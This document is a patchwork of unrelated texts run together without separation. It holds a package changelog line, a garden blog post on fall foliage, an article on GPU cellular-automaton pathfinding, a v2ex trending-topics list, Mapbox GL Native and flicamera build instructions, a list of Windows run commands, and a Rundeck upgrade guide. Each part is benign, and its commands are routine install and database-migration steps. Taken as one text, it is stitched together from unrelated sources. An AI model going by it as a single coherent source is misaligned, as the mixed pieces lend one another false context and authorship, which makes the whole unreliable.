# 0.1.0 (2019-02-05)
### Features
* **transducers-binary:** extract as new pkg from [@thi](https://github.com/thi).ng/transducers ([02877c7](https://github.com/thi-ng/umbrella/commit/02877c7))
---
title: Enthralled with Fall
date: 2016-11-15 00:00:00 -07:00
categories:
- whats-blooming
layout: post
blog-banner: whats-blooming-now-fall.jpg
post-date: November 15, 2016
post-time: 11:03 AM
blog-image: 2016-11-15-wbn.jpg
---
<div class="text-center">Come enjoy the sweater weather this November. You are sure to be captivated by the Garden's vibrance.</div>
<div class="text-center">
<img src="/images/blogs/Mahonia%20repens%20Fall%20Foliage%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Oregon Grape <i>Mahonia repens</i></p>
<p>This small shrub appears to be on fire when struck by the sun.</p>
</div>
<div class="text-center">
<img src="/images/blogs/Symphoricarpos%20%27Bokrabright%27%20Fruit%20HMS16.jpg" width="560" height="935" alt="" title="" />
<p>Bright Fantasy™ Snowberry <i>Symphoricarpos</i> 'Bokrabright'</p>
<p>Along the Orangerie Boardwalk, this bush is brimming with fruit!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Viburnum%20carlesii%20Leaves%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Koreanspice Viburnum <i> Viburnum carlesii</i></p>
<p>What fantastic red leaves!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Rosa%20%27KORbin%27%20Flower%20HMS16.jpg" width="560" height="370" alt="" title="" />
<p>Iceberg Rose <i>Rosa</i> 'KORbin'</p>
<p>This elegant beauty is still in full bloom!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Pyrus%20communis%20%27Bartlett%27%20Fall%20Foliage%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Bartlett Pear <i>Pyrus communis</i> 'Bartlett'</p>
</div>
<div class="text-center">The Pear Arbor is sure colorful right now!</div>
<div class="text-center">This sunny weather won't last much longer, so don't delay your visit to the Garden.</div>
<h5 class="text-center green">Photos by Heidi Simper</h5>
---
title: A GPU Approach to Path Finding
layout: post
date: 2014-06-22T22:51:46Z
tags: [ai, webgl, javascript, gpgpu, opengl]
uuid: 29de5cb3-f93a-3e6e-9adc-ff689e736877
---
Last time [I demonstrated how to run Conway's Game of Life][gol]
entirely on a graphics card. This concept can be generalized to *any*
cellular automaton, including automata with more than two states. In
this article I'm going to exploit this to solve the [shortest path
problem][spp] for two-dimensional grids entirely on a GPU. It will be
just as fast as traditional searches on a CPU.
The JavaScript side of things is essentially the same as before — two
textures with fragment shader in between that steps the automaton
forward — so I won't be repeating myself. The only parts that have
changed are the cell state encoding (to express all automaton states)
and the fragment shader (to code the new rules).
* [Online Demo](http://skeeto.github.io/webgl-path-solver/)
([source](https://github.com/skeeto/webgl-path-solver))
Included is a pure JavaScript implementation of the cellular
automaton (State.js) that I used for debugging and experimentation,
but it doesn't actually get used in the demo. A fragment shader
(12state.frag) encodes the full automaton rules for the GPU.
### Maze-solving Cellular Automaton
There's a dead simple 2-state cellular automaton that can solve any
*perfect* maze of arbitrary dimension. Each cell is either OPEN or a
WALL, only 4-connected neighbors are considered, and there's only one
rule: if an OPEN cell has only one OPEN neighbor, it becomes a WALL.

On each step the dead ends collapse towards the solution. In the above
GIF, in order to keep the start and finish from collapsing, I've added
a third state (red) that holds them open. On a GPU, you'd have to do
as many draws as the length of the longest dead end.
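A plain-JavaScript sketch of one synchronous step makes the rule concrete. This is our own illustration (the demo's State.js plays a similar role); cells outside the grid count as walls, and the held-open start/finish state is omitted for brevity:

```javascript
// One step of the 2-state automaton: an OPEN cell with exactly one OPEN
// neighbor is the tip of a dead end, so it becomes a WALL.
function step(grid) {
  var next = grid.map(function (row) { return row.slice(); });
  for (var y = 0; y < grid.length; y++) {
    for (var x = 0; x < grid[y].length; x++) {
      if (grid[y][x] !== 'OPEN') continue;
      var open = [[0, -1], [0, 1], [-1, 0], [1, 0]].filter(function (d) {
        return (grid[y + d[1]] || [])[x + d[0]] === 'OPEN'; // out of grid: wall
      }).length;
      if (open === 1) next[y][x] = 'WALL';
    }
  }
  return next;
}
```

Each call collapses every dead end by one cell, which is why the number of draws scales with the longest dead end.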
A perfect maze is a maze where there is exactly one solution. This
technique doesn't work for mazes with multiple solutions, loops, or
open spaces. The extra solutions won't collapse into one, let alone
the shortest one.

To fix this we need a more advanced cellular automaton.
### Path-solving Cellular Automaton
I came up with a 12-state cellular automaton that can not only solve
mazes, but will specifically find the shortest path. Like above, it
only considers 4-connected neighbors.
* OPEN (white): passable space in the maze
* WALL (black): impassable space in the maze
* BEGIN (red): starting position
* END (red): goal position
* FLOW (green): flood fill that comes in four flavors: north, east, south, west
* ROUTE (blue): shortest path solution, also comes in four flavors
If we wanted to consider 8-connected neighbors, everything would be
the same, but it would require 20 states (n, ne, e, se, s, sw, w, nw)
instead of 12. The rules are still pretty simple.
* WALL and ROUTE cells never change state.
* OPEN becomes FLOW if it has any adjacent FLOW cells. It points
towards the neighboring FLOW cell (n, e, s, w).
* END becomes ROUTE if adjacent to a FLOW cell. It points towards the
FLOW cell (n, e, s, w). This rule is important for preventing
multiple solutions from appearing.
* FLOW becomes ROUTE if adjacent to a ROUTE cell that points towards
it. Combined with the above rule, it means when a FLOW cell touches
a ROUTE cell, there's a cascade.
* BEGIN becomes ROUTE when adjacent to a ROUTE cell. The direction is
unimportant. This rule isn't strictly necessary but will come in
handy later.
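Here is how those rules look as a per-cell transition function in plain JavaScript. This is an illustrative sketch, not the shader; one detail the rule list leaves implicit is how the flood gets seeded, so this sketch assumes a BEGIN cell also acts as a flow source:

```javascript
var DIRS = { N: [0, -1], E: [1, 0], S: [0, 1], W: [-1, 0] };
var OPP = { N: 'S', E: 'W', S: 'N', W: 'E' };

// get(x, y) returns the current state of any cell: 'OPEN', 'WALL', 'BEGIN',
// 'END', 'FLOW_N'..'FLOW_W', or 'ROUTE_N'..'ROUTE_W'; out of bounds is 'WALL'.
function transition(get, x, y) {
  var s = get(x, y);
  if (s === 'WALL' || s.indexOf('ROUTE') === 0) return s; // never change
  for (var d in DIRS) {
    var n = get(x + DIRS[d][0], y + DIRS[d][1]);
    if (s === 'OPEN' && (n.indexOf('FLOW') === 0 || n === 'BEGIN'))
      return 'FLOW_' + d;           // join the flood, pointing back at it
    if (s === 'END' && n.indexOf('FLOW') === 0)
      return 'ROUTE_' + d;          // goal reached: start tracing the route
    if (s === 'BEGIN' && n.indexOf('ROUTE') === 0)
      return 'ROUTE_' + d;          // the route made it back to the start
    if (s.indexOf('FLOW') === 0 && n === 'ROUTE_' + OPP[d])
      return 'ROUTE_' + s.slice(5); // route cascades back along the flow
  }
  return s;
}
```

Applying this synchronously to every cell until BEGIN turns into a ROUTE cell reproduces the flood-then-trace behavior described above.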
This can be generalized for cellular grids of any arbitrary dimension,
and it could even run on a GPU for higher dimensions, limited
primarily by the number of texture uniform bindings (2D needs 1
texture binding, 3D needs 2 texture bindings, 4D needs 8 texture
bindings ... I think). But if you need to find the shortest path along
a five-dimensional grid, I'd like to know why!
So what does it look like?

FLOW cells flood the entire maze. Branches of the maze are searched in
parallel as they're discovered. As soon as an END cell is touched, a
ROUTE is traced backwards along the flow to the BEGIN cell. It
requires double the number of steps as the length of the shortest
path.
Note that the FLOW cells keep flooding the maze even after the END was
found. It's a cellular automaton, so there's no way to communicate to
these other cells that the solution was discovered. However, when
running on a GPU this wouldn't matter anyway. There's no bailing out
early before all the fragment shaders have run.
What's great about this is that we're not limited to mazes whatsoever.
Here's a path through a few connected rooms with open space.

#### Maze Types
The worst-case solution is the longest possible shortest path. There's
only one frontier and running the entire automaton to push it forward
by one cell is inefficient, even for a GPU.

The way a maze is generated plays a large role in how quickly the
cellular automaton can solve it. A common maze generation algorithm
is a random depth-first search (DFS). The entire maze starts out
entirely walled in and the algorithm wanders around at random plowing
down walls, but never breaking into open space. When it comes to a
dead end, it unwinds looking for new walls to knock down. This method
tends towards long, winding paths with a low branching factor.
The mazes you see in the demo are Kruskal's algorithm mazes. Walls are
knocked out at random anywhere in the maze, without breaking the
perfect maze rule. It has a much higher branching factor and makes for
a much more interesting demo.
#### Skipping the Route Step
On my computers, with a 1023x1023 Kruskal maze <del>it's about an
order of magnitude slower</del> (see update below) than [A\*][astar]
([rot.js's version][rot]) for the same maze. <del>Not very
impressive!</del> I *believe* this gap will close with time, as GPUs
become parallel faster than CPUs get faster. However, there's
something important to consider: it's not only solving the shortest
path between source and goal, **it's finding the shortest path between
the source and any other point**. At its core it's a [breadth-first
grid search][bfs].
*Update*: One day after writing this article I realized that
`glReadPixels` was causing a gigantic bottleneck. By only checking for
the end conditions once every 500 iterations, this method is now
equally fast as A* on modern graphics cards, despite taking up to an
extra 499 iterations. **In just a few more years, this technique
should be faster than A*.**
Really, there's little use in the ROUTE step. It's a poor fit for the GPU.
It has no use in any real application. I'm using it here mainly for
demonstration purposes. If dropped, the cellular automaton would
become 6 states: OPEN, WALL, and four flavors of FLOW. Seed the source
point with a FLOW cell (arbitrary direction) and run the automaton
until all of the OPEN cells are gone.
### Detecting End State
The ROUTE cells do have a useful purpose, though. How do we know when
we're done? We can poll the BEGIN cell to check for when it becomes a
ROUTE cell. Then we know we've found the solution. This doesn't
necessarily mean all of the FLOW cells have finished propagating,
though, especially in the case of a DFS-maze.
In a CPU-based solution, I'd keep a counter and increment it every
time an OPEN cell changes state. If the counter doesn't change after
an iteration, I'm done. OpenGL 4.2 introduces an [atomic
counter][atom] that could serve this role, but this isn't available in
OpenGL ES / WebGL. The only thing left to do is use `glReadPixels` to
pull down the entire thing and check for end state on the CPU.
The original 2-state automaton above also suffers from this problem.
### Encoding Cell State
Cells are stored per pixel in a GPU texture. I spent quite some time
trying to brainstorm a clever way to encode the twelve cell states
into a vec4 color. Perhaps there's some way to [exploit
blending][blend] to update cell states, or make use of some other kind
of built-in pixel math. I couldn't think of anything better than a
straight-forward encoding of 0 to 11 into a single color channel (red
in my case).
~~~glsl
int state(vec2 offset) {
vec2 coord = (gl_FragCoord.xy + offset) / scale;
vec4 color = texture2D(maze, coord);
return int(color.r * 11.0 + 0.5);
}
~~~
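The same encoding is easy to invert on the JavaScript side after a `glReadPixels` readback. A sketch (these are our own helper functions, mirroring the shader's `int(color.r * 11.0 + 0.5)`):

```javascript
// Map a state index 0..11 to a red byte, and a red byte back to the index.
// The +0.5 rounding makes the round trip exact despite the 8-bit channel.
function encodeState(state) {
  return Math.round(state / 11 * 255);
}
function decodeState(redByte) {
  return Math.floor(redByte / 255 * 11 + 0.5);
}
```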
This leaves three untouched channels for other useful information. I
experimented (uncommitted) with writing distance in the green channel.
When an OPEN cell becomes a FLOW cell, it adds 1 to its adjacent FLOW
cell distance. I imagine this could be really useful in a real
application: put your map on the GPU, run the cellular automaton a
sufficient number of times, pull the map back off (`glReadPixels`),
and for every point you know both the path and total distance to the
source point.
### Performance
As mentioned above, I ran the GPU maze-solver against A* to test its
performance. I didn't yet try running it against Dijkstra’s algorithm
on a CPU over the entire grid (one source, many destinations). If I
had to guess, I'd bet the GPU would come out on top for grids with a
high branching factor (open spaces, etc.) so that its parallelism is
most effectively exploited, but Dijkstra's algorithm would win in all
other cases.
Overall this is more of a proof of concept than a practical
application. It's proof that we can trick OpenGL into solving mazes
for us!
[gol]: /blog/2014/06/10/
[spp]: http://en.wikipedia.org/wiki/Shortest_path_problem
[astar]: http://en.wikipedia.org/wiki/A*_search_algorithm
[rot]: http://ondras.github.io/rot.js/hp/
[bfs]: http://www.redblobgames.com/pathfinding/tower-defense/
[atom]: http://www.opengl.org/wiki/Atomic_Counter
[blend]: /blog/2014/06/21/
# v2ex Trending Topics
`Last updated: 2022-02-03 11:14:25 +0800`
1. [How do I transfer a 500 GB file from the US back to China?](https://www.v2ex.com/t/831705)
1. [Why are brand-name TVs on the Japanese market so much more expensive than in China?](https://www.v2ex.com/t/831670)
1. [clash stopped working after upgrading to 12.2](https://www.v2ex.com/t/831648)
1. [My curious experience applying for a public IP from Guangdong Unicom](https://www.v2ex.com/t/831649)
1. [Is there any bad-tasting rice (as a staple) that could help me limit my portions (no stale rice, please)? I normally eat a lot, so recommendations for off-tasting, hard-to-swallow rice would help me eat less.](https://www.v2ex.com/t/831695)
1. [How well does a 27-inch 4K display actually work with a Mac?](https://www.v2ex.com/t/831684)
1. [Annual premium members: remember to claim your 5 B-coins at the start of the month](https://www.v2ex.com/t/831644)
1. [Is now (February 2022) a good time to buy a MacBook Air?](https://www.v2ex.com/t/831713)
1. [Who made yet another SEO spam site to annoy people?](https://www.v2ex.com/t/831664)
# Building & Developing Mapbox GL Native from Source
**Just trying to use Mapbox GL Native? You don't need to read this stuff! We
provide [easy-to-install, prebuilt versions of the Mapbox SDKs for iOS and Android
that you can download instantly and get started with fast](https://www.mapbox.com/mobile/).**
Still with us? These are the instructions you'll need to build Mapbox GL Native
from source on a variety of platforms and set up a development environment.
Your journey will start with getting the source code, then installing the
dependencies, and then setting up a development environment, which varies
depending on your operating system and what platform you want to develop for.
## 1: Getting the source
Clone the git repository:
git clone https://github.com/mapbox/mapbox-gl-native.git
cd mapbox-gl-native
## 2: Installing dependencies
These dependencies are required for all operating systems and all platform
targets.
- Modern C++ compiler that supports `-std=c++14`\*
- clang++ 3.5 or later _or_
- g++-4.9 or later
- [CMake](https://cmake.org/) 3.1 or later (for build only)
- [cURL](https://curl.haxx.se) (for build only)
- [Node.js](https://nodejs.org/) 4.2.1 or later (for build only)
- [`pkg-config`](https://wiki.freedesktop.org/www/Software/pkg-config/) (for build only)
**Note**: We partially support C++14 because GCC 4.9 does not fully implement the
final draft of the C++14 standard. More information in [DEVELOPING.md](DEVELOPING.md).
Depending on your operating system and target, you'll need additional
dependencies:
### Additional dependencies for Linux
- [`libcurl`](http://curl.haxx.se/libcurl/) (depends on OpenSSL)
### Additional dependencies for macOS
- Apple Command Line Tools (available at [Apple Developer](https://developer.apple.com/download/more/))
- [Homebrew](http://brew.sh)
- [Cask](http://caskroom.io/) (if building for Android)
- [xcpretty](https://github.com/supermarin/xcpretty) (`gem install xcpretty`)
### Optional dependencies
- [ccache](https://ccache.samba.org) (for build only; improves recompilation performance)
## 3: Setting up a development environment & building
See the relevant SDK documentation for next steps:
* [Mapbox Android SDK](platform/android/)
* [Mapbox iOS SDK](platform/ios/)
* [Mapbox macOS SDK](platform/macos/)
* [Mapbox Qt SDK](platform/qt/)
* [Mapbox GL Native on Linux](platform/linux/)
* [node-mapbox-gl-native](platform/node/)
## 4: Keeping up to date
This repository uses Git submodules, which should be automatically checked out when you first run a `make` command for one of the above platforms. These submodules are not updated automatically and we recommend that you run `git submodule update` after pulling down new commits to this repository.
# flicamera

[Code style: black](https://github.com/psf/black)
[Documentation Status](https://sdss-flicamera.readthedocs.io/en/latest/?badge=latest)
[Test](https://github.com/sdss/flicamera/actions)
[Docker](https://github.com/sdss/flicamera/actions)
[codecov](https://codecov.io/gh/sdss/flicamera)
A library to control Finger Lakes Instrumentation cameras. It provides the SDSS `gfaCamera` and `fvcCamera` actors to control the Guide, Focus and Acquisition cameras and Field View Camera, respectively.
## Installation
In general you should be able to install ``flicamera`` by doing
```console
pip install sdss-flicamera
```
Although `flicamera` should handle all the compilation of the FLI libraries, you may still need to modify your system to give your user access to the FLI USB devices. See [here](https://github.com/sdss/flicamera/blob/master/cextern/README.md) for more details.
To build from source, use
```console
git clone [email protected]:sdss/flicamera
cd flicamera
pip install .[docs]
```
## Development
`flicamera` uses [poetry](http://poetry.eustace.io/) for dependency management and packaging. To work with an editable install it's recommended that you setup `poetry` and install `flicamera` in a virtual environment by doing
```console
poetry install
```
Pip does not support editable installs with PEP-517 yet. That means that running `pip install -e .` will fail because `poetry` doesn't use a `setup.py` file. As a workaround, you can use the `create_setup.py` file to generate a temporary `setup.py` file. To install `flicamera` in editable mode without `poetry`, do
```console
pip install --pre poetry
python create_setup.py
pip install -e .
```
Disk Management: diskmgmt.msc
Computer Management: compmgmt.msc
Services: services.msc
Control Panel: control
Task Manager: Taskmgr
Remote Desktop Connection: mstsc
Registry Editor: regedit
Paint: mspaint
Snipping Tool: snippingtool
% Upgrade Guide
% Greg Schueler
% April 15, 2015
## Upgrading to Rundeck 2.11
(If you are upgrading from a version earlier than 2.10.x, please peruse the rest of this document for any other issues regarding intermediate versions.)
Potentially breaking changes:
**RPM spec:**
The `rundeck` user/group is now created within system UID ranges [#3195](https://github.com/rundeck/rundeck/pull/3195).
**ACLs: Edit Project Configuration/Nodes GUI access level requirements changed:**
Previously: GUI actions "Project > Edit Configuration" and "Project > Edit Nodes" required `admin` project access. Now: only `configure` level access is required.
NOTE: API behavior was always this way, so this change simply aligns the access requirements.
Potential security implications:
* users/roles granted `configure` access to a project will now be able to modify Project Nodes or Configuration via the GUI
* the same users/roles would already have this access if using the API
See: [#3084](https://github.com/rundeck/rundeck/pull/3084)
**ACLs: Job Definition visibility**
A new ACL access level `view` is a subset of the `read` access level for jobs, and does not allow users to view the "Definition" tab of a Job, or download the XML/YAML definitions.
ACLs which allow `read` to Jobs, will work as before. To disallow Job Definition viewing/downloading, you should change your ACLs to only allow `view` access.
**Project Storage Type is now `db` by default:**
If you want to continue using filesystem storage for project config/readme/motd files, you will need to set this in your `rundeck-config.properties` before upgrading:
    rundeck.projectsStorageType=filesystem
Upgrading an existing `filesystem` configuration to `db` is automatic, and project configs/readme/motd will be loaded into DB storage at system startup.
To encrypt the DB storage, you will need to [enable encryption for the "Project Configuration" storage layer](http://rundeck.org/docs/plugins-user-guide/bundled-plugins.html#jasypt-encryption-plugin).
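As a sketch of what enabling that looks like, the converter is declared in `rundeck-config.properties`. The key names and values below are assumptions based on the Storage Converter Plugin documentation; verify them against your Rundeck version before use:

```shell
# Append an illustrative Jasypt converter entry for the Project Configuration
# storage layer. Key names and the password value here are assumptions; check
# the linked plugin documentation before relying on them.
cat >> rundeck-config.properties <<'EOF'
rundeck.config.storage.converter.1.type=jasypt-encryption
rundeck.config.storage.converter.1.path=projects
rundeck.config.storage.converter.1.config.encryptorType=basic
rundeck.config.storage.converter.1.config.password=changeme
EOF
echo "converter config appended"
```

Run it from the directory holding `rundeck-config.properties` (for RPM/Deb installs that is `/etc/rundeck`).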
## Upgrading to Rundeck 2.8.1 from 2.8.0
### Important Note
If you have previously installed Rundeck 2.8.0, using Mysql or H2 database, the 2.8.1 update
will not work correctly. A DB schema change was required to fix a bug with Postgres and other databases:
(`user` is a reserved word).
If you upgrade from 2.7.x to 2.8.1 (skipping 2.8.0), or install 2.8.1 from scratch, you will *not* encounter this problem.
Use the following methods to update your DB schema for Mysql or H2 if you are upgrading from 2.8.0 to 2.8.1:
#### Mysql upgrade to 2.8.1 from 2.8.0
1. Stop Rundeck
2. Run the following SQL script, to rename the `user` column in the `job_file_record` table to `rduser`.
~~~{.sql}
use rundeck;
alter table job_file_record change column user rduser varchar(255) not null;
~~~
After running this script, you can proceed with the 2.8.1 upgrade.
#### H2 upgrade to 2.8.1 from 2.8.0
For H2, you will need to do the following:
1. Shut down Rundeck.
2. (backup your H2 database contents, see [Backup and Recovery][]).
3. Use the h2 [`RunScript`](http://h2database.com/javadoc/org/h2/tools/RunScript.html) command
to run the following SQL script.
To run the script you will need:
* URL defining the location of your H2 database. This is the same as the `dataSource.url` defined in
your `rundeck-config.properties`.
    * For RPM/DEB installs it is `jdbc:h2:file:/var/lib/rundeck/data/rundeckdb`.
    * For a Launcher install, it will include your `$RDECK_BASE` path. It can be relative to your current
working directory, such as `jdbc:h2:file:$RDECK_BASE/server/data/grailsdb`.
* File path to the `h2-1.4.x.jar` jar file, which is in the expanded war contents of the Rundeck install.
    * For RPM/DEB installs it is `/var/lib/rundeck/exp/webapp/WEB-INF/lib/h2-1.4.193.jar`.
    * For a launcher install it will be under your `$RDECK_BASE`, such as:
      `$RDECK_BASE/server/exp/webapp/WEB-INF/lib/h2-1.4.193.jar`
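The two inputs above boil down to two shell variables; this sketch fills them in for either layout (only the paths quoted above are assumed):

```shell
# Pick whichever install layout exists; both paths come from the bullets above.
for d in /var/lib/rundeck/exp/webapp/WEB-INF/lib \
         "${RDECK_BASE:-/opt/rundeck}/server/exp/webapp/WEB-INF/lib"; do
  [ -d "$d" ] && H2_JAR_FILE=$(ls "$d"/h2-1.4.*.jar 2>/dev/null | head -n 1) && break
done
H2_URL=${H2_URL:-jdbc:h2:file:/var/lib/rundeck/data/rundeckdb}
echo "jar: ${H2_JAR_FILE:-not found}  url: $H2_URL"
```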
Save this into a file `upgrade-2.8.1.sql`:
~~~ {.sql}
alter table job_file_record rename column user to rduser;
~~~
Run this command:
~~~ {.bash}
H2_JAR_FILE=... #jar file location
H2_URL=... #jdbc URL
java -cp $H2_JAR_FILE org.h2.tools.RunScript \
-url $H2_URL \
-user sa \
-script upgrade-2.8.1.sql
~~~
This command should complete with a 0 exit code (and no output).
You can now upgrade to 2.8.1.
**Error output**
If you see output containing `Column "USER" not found;` then you have already run this script successfully.
If you see output containing `Table "JOB_FILE_RECORD" not found`, then you probably did not have 2.8.0 installed,
you should be able to upgrade from 2.7 without a problem.
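A small wrapper can map those messages to outcomes; the quoted strings come from the text above, everything else is scaffolding:

```shell
# Classify RunScript output; $H2_JAR_FILE and $H2_URL as set up earlier.
out=$(java -cp "$H2_JAR_FILE" org.h2.tools.RunScript \
        -url "$H2_URL" -user sa -script upgrade-2.8.1.sql 2>&1)
case $out in
  *'Column "USER" not found'*)           verdict="already migrated - nothing to do" ;;
  *'Table "JOB_FILE_RECORD" not found'*) verdict="no 2.8.0 schema - upgrade straight from 2.7" ;;
  '')                                    verdict="migration applied cleanly" ;;
  *)                                     verdict="unexpected output: $out" ;;
esac
echo "$verdict"
```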
[Backup and Recovery]: ../administration/backup-and-recovery.html
## Upgrading to Rundeck 2.8 from earlier versions
### Java 8 is required
Rundeck server now requires Java 8.
## Upgrading to Rundeck 2.7 from 2.6.x
### Java 8 is required
Well, not technically *required* for Rundeck server so much as heavily frowned upon. You should upgrade, consider Java 7 no longer supported. We may switch to actually requiring it soon.
### Default database (H2) upgraded to 1.4.x
The new version uses a different storage format ("mv_store") so switching back to 2.6 after creating a DB with 2.7 may not work.
In-place upgrades with the old storage format do seem to work; however, if you need to keep compatibility with an existing older H2 database, you can update your dataSource.url in rundeck-config.properties to add `;mv_store=false`:
    dataSource.url = jdbc:h2:file:/path;MVCC=true;mv_store=false
* You can remove `;TRACE_LEVEL_FILE=4` from the dataSource.url in rundeck-config.properties
### CLI tools are gone
We have removed the "rd-*" and "dispatch" and "run" tools from the install, although the "rd-acl" tool is still available.
You should use the new "rd" tool available separately, see <https://rundeck.github.io/rundeck-cli/>.
However, `rd` *does* require Java 8. (See, gotcha.)
### Debian/RPM startup script changes
The file `/etc/rundeck/profile` was modified and will probably not work with your existing install.
(This change was snafu'd into 2.6.10 and reverted in 2.6.11)
If you have customized `/etc/rundeck/profile`, look at the new contents and move your custom env var changes to a file in `/etc/sysconfig/rundeckd`.
### Inline script token expansion changes
(This is another change that had some hiccups in the 2.6.10 release.)
You must now use `@@` (two at-signs) to produce a literal `@` in an inline script when it might be interpreted as a token, i.e. `@word@` looks like a token, but `@word space@` is ok.
You can globally disable inline script token expansion, see [framework.properties](../administration/configuration-file-reference.html#framework.properties).
### Jetty embedded server was upgraded to 9.0.x
If you are using the default "realm.properties" login mechanism, the default JAAS configuration for file-based authentication will need to be modified to use the correct class name in your `jaas-loginmodule.conf`:
* **old value**: `org.eclipse.jetty.plus.jaas.spi.PropertyFileLoginModule`
* Replace with: `org.eclipse.jetty.jaas.spi.PropertyFileLoginModule`
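That rename can be scripted; the default path below is the RPM/Deb one, so override `JAAS_CONF` for a launcher install:

```shell
# Swap the old login module class name for the Jetty 9 one, keeping a backup.
JAAS_CONF=${JAAS_CONF:-/etc/rundeck/jaas-loginmodule.conf}
if [ -f "$JAAS_CONF" ]; then
  cp "$JAAS_CONF" "$JAAS_CONF.bak"
  sed -i 's/org\.eclipse\.jetty\.plus\.jaas\.spi\.PropertyFileLoginModule/org.eclipse.jetty.jaas.spi.PropertyFileLoginModule/' "$JAAS_CONF"
  echo "updated $JAAS_CONF (backup in $JAAS_CONF.bak)"
else
  echo "no jaas config at $JAAS_CONF - nothing to do"
fi
```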
## Upgrading to Rundeck 2.5
### Java 7 required
Java 7 is now required for Rundeck 2.5, and Java 8 can be used. Java 6 will not work.
### Scheduled Jobs with required option default values
A bug in Rundeck previously allowed Jobs to be saved with a schedule
even if an Option marked "required" did not have a default value.
The result was that the scheduler would fail to execute the job silently.
In Rundeck 2.5 this is now considered a validation error when creating or importing the job definition,
so any scheduled jobs with required options need to have a default value set.
### rd-project create of existing project
If `rd-project -a create -p projectname` is executed for an existing project, this will now fail.
### Database schema
This release adds some new DB tables but does not alter the schema of other tables.
### Project definitions stored in DB
Rundeck 2.4 and earlier used the filesystem to store Projects and their configuration.
Rundeck 2.5 can now use the DB to store project definition and configuration,
but this is not enabled by default.
If you have projects that exist on the filesystem, when you upgrade to Rundeck 2.5, these projects
and their configuration files can be automatically imported into the DB. This means that
the contents of `project.properties` will be copied to the DB,
using Rundeck's [Storage Facility](../administration/storage-facility.html).
In addition, there is *no encryption by default*, if you want the contents of your project.properties
to be encrypted in the DB, you must configure
[Storage Converter Plugins](../plugins-user-guide/configuring.html#storage-converter-plugins)
to use an encryption plugin. There is now a [Jasypt Encryption Plugin](../plugins-user-guide/storage-plugins.html#jasypt-encryption-converter-plugin) included with Rundeck which can be used.
**Enable project DB storage**:
You can configure Rundeck to use the Database by adding the following to
`rundeck-config.properties` before starting it up:
    rundeck.projectsStorageType=db
When importing previously created filesystem projects, the contents of these files are imported to the DB:
* `etc/project.properties`
* `readme.md`
* `motd.md`
In addition, after importing, the `project.properties` file will be renamed to `project.properties.imported`.
If desired, you can switch back to using filesystem projects by doing this:
1. set `rundeck.projectsStorageType=filesystem` in `rundeck-config.properties`
2. rename each `project.properties.imported` file back to `project.properties`
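Both steps can be scripted. The paths below are the RPM/Deb defaults and are assumptions for any other layout:

```shell
# 1) flip the storage type back, 2) restore each renamed project.properties.
CONF=${CONF:-/etc/rundeck/rundeck-config.properties}
PROJECTS=${PROJECTS:-/var/rundeck/projects}
[ -f "$CONF" ] && \
  sed -i 's/^rundeck\.projectsStorageType=.*/rundeck.projectsStorageType=filesystem/' "$CONF"
for f in "$PROJECTS"/*/etc/project.properties.imported; do
  [ -e "$f" ] && mv "$f" "${f%.imported}"
done
echo "done"
```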
### web.xml changes
The `web.xml` file has changed significantly from 2.4.x to Rundeck 2.5.x.
For this reason, if you have modified your `web.xml` file, located at
`/var/lib/rundeck/exp/webapp/WEB-INF/web.xml`,
for example to change the `<security-role><role-name>user</role-name></security-role>`,
then you may need to back it up, and re-apply the changes you made after upgrading to 2.5.x.
If you receive a "Service Unavailable" error on startup, and the service.log file contains this message:
    java.lang.ClassNotFoundException: org.codehaus.groovy.grails.web.sitemesh.GrailsPageFilter
Then that means your web.xml file is out of date. Replace it with the one from 2.5 installation,
then re-apply your changes to `<role-name>`.
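A quick probe for that symptom (the path is the RPM/Deb default):

```shell
# An out-of-date web.xml references GrailsPageFilter, which 2.5 no longer ships.
WEBXML=${WEBXML:-/var/lib/rundeck/exp/webapp/WEB-INF/web.xml}
if grep -q 'GrailsPageFilter' "$WEBXML" 2>/dev/null; then
  echo "stale web.xml: replace it with the 2.5 copy, then re-apply your role-name edits"
else
  echo "no GrailsPageFilter reference found in $WEBXML"
fi
```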
## Upgrading to Rundeck 2.1
### Database schema
If you are upgrading from 2.0.x, be sure to perform backups prior to upgrading.
This release adds a new DB table
but does not alter the schema of other tables.
### ACL policy additions
Project access via API has been improved, and new authorizations are now required for project access. See [Administration - Access Control Policy](../administration/access-control-policy.html#application-scope-resources-and-actions).
* project access adds `configure`,`delete`,`import`,`export` actions
* `admin` access still allows all actions
Example allowing explicit actions:
    context:
      application: 'rundeck'
    for:
      resource:
        - equals:
            kind: 'project'
          allow: [create] # allow creating new projects
      project:
        - equals:
            name: 'myproject'
          allow: [read,configure,delete,import,export,admin] # access to 'myproject'
    by:
      group: admin
The storage facility for uploading public/private keys requires authorization to use. The default `admin.aclpolicy` and `apitoken.aclpolicy` provide this access, but if you have custom policies you may want to allow access to these actions.
* `storage` can allow `create`,`update`,`read`, or `delete`
* you can match on `path` or `name` to narrow the access
The default apitoken aclpolicy file allows this access:
    context:
      application: 'rundeck'
    for:
      storage:
        - match:
            path: '(keys|keys/.*)'
          allow: '*' # allow all access to manage stored keys
    by:
      group: api_token_group
## Upgrading to Rundeck 2.0 from 1.6.x
Rundeck 2.0 has some under-the-hood changes, so please follow this guide when upgrading from Rundeck 1.6.x.
The first step is always to make a backup of all important data for your existing Rundeck installation. Refer to the [Administration - Backup and Recovery](../administration/backup-and-recovery.html) section.
## Clean install
The most direct upgrade method is to use the project export/import method and a clean install of Rundeck 2.0.
Before shutting down your 1.6.x installation, perform **Project Export** for each project you wish to migrate:
1. Select your project
2. Click the *Configure* tab in the header.
3. Click the link under *Export Project Archive* to save it to your local disk.
4. Make a copy of all project files under the projects directory for the project, e.g. `$RDECK_BASE/projects/NAME` (launcher) or `/var/rundeck/projects/NAME` (RPM/Deb). This includes the project.properties configuration as well as resources files.
Perform a *clean* install of Rundeck 2.0 (no cheating!).
Then Import the projects you exported:
1. Create a new project, or select an existing project.
2. Click the *gear icon* for the Configure page in the header.
3. Click the *Import Archive* Tab
4. Under *Choose a Rundeck Archive* pick the archive file you downloaded earlier
5. Click *Import*
Finally, restore the project files for the imported project.
## Upgrading JAAS properties file
If you are not doing a clean install, and you want to maintain your JAAS login module configuration, you may have to change your jaas.conf file.
